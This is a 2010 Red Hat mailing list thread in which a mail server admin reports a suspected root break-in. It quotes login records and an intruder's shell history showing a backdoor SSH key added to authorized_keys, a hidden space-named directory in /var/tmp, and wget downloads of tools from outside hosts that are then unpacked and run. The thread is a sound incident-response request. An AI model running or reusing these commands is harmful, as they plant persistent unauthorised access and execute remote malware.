still i m thinking how he/she got my password?? On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@xxxxxxxxx> wrote: > i have changed my root password > > > On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan@xxxxxxxxx > > wrote: > >> You may change your root password first, and then you can continue to >> analyze your system. >> >> ________________________________________ >> From: redhat-list-bounces@xxxxxxxxxx [redhat-list-bounces@xxxxxxxxxx] On >> Behalf Of Joy Methew [ml4joy@xxxxxxxxx] >> Sent: Thursday, January 28, 2010 12:59 PM >> To: General Red Hat Linux discussion list >> Subject: help >> >> Hello all, >> i m using RHEL5.3 as a my mail server with real ip.i >> configure my system mostly remotely.last login time of my system 27 jan >> from this ip 118.129.153.43. >> than i try to login at 28 jan in morning so i can`t got authentication as >> root from my last password. >> than i reboot the system reset my password. >> i login as a root than i run "last" command i m sending tha first 10 lines >> of last command...i thinks someone hack my system.i am sending history >> command output. >> now i remove .ssh directory and /var/tmp/* >> >> please suggest wat is this?? >> >> thanks >> >> last command out put: >> root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in >> root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in >> root tty1 Thu Jan 28 10:48 - 10:52 (00:04) >> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25) >> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09) >> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25) >> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00) >> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00) >> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01) >> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03) >> >> What is 165.red-79........this is nt my ip. >> >> >> History Output >> >> 115 cat /proc/cpuinfo >> 116 mkdir .ssh >> 117 cd .ssh >> 118 echo ssh-rsa >> >> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== >> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 >> ~/.ssh/authorized_keys >> 119 cd /var/tmp >> 120 mkdir " " >> 121 cd " " >> 122 passwd >> 123 echo ssh-rsa >> >> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== >> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 >> ~/.ssh/authorized_keys >> 124 ps -x >> 125 cd /var/tmp >> 126 w >> 127 wget http://kok.ucoz.de/gosh.tgz >> 128 tar xvf gosh.tgz >> 129 cd gosh >> 130 chmod +x * >> 131 ./go.sh 121 >> 132 w >> 133 ps -x >> 134 ps -aux >> 135 cd /var/tmp >> 136 cd " " >> 137 ls -a >> 138 wget http://helpbnc.myftp.org/danger/fld.tgz >> 139 tar xzvf fld.tgz >> 140 cd fld >> 141 chmod +x * >> 142 nano cyc.acc >> 143 nano cyc.acc.1 >> 144 nano cyc.set >> 145 ./httpd >> 146 w >> -- >> redhat-list mailing list >> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe >> https://www.redhat.com/mailman/listinfo/redhat-list >> >> -- >> redhat-list mailing list >> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe >> https://www.redhat.com/mailman/listinfo/redhat-list >> > > -- redhat-list mailing list unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe https://www.redhat.com/mailman/listinfo/redhat-list
